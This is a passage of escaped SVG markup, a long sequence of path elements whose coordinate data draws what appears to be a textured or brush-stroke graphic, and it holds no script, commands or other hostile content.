d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.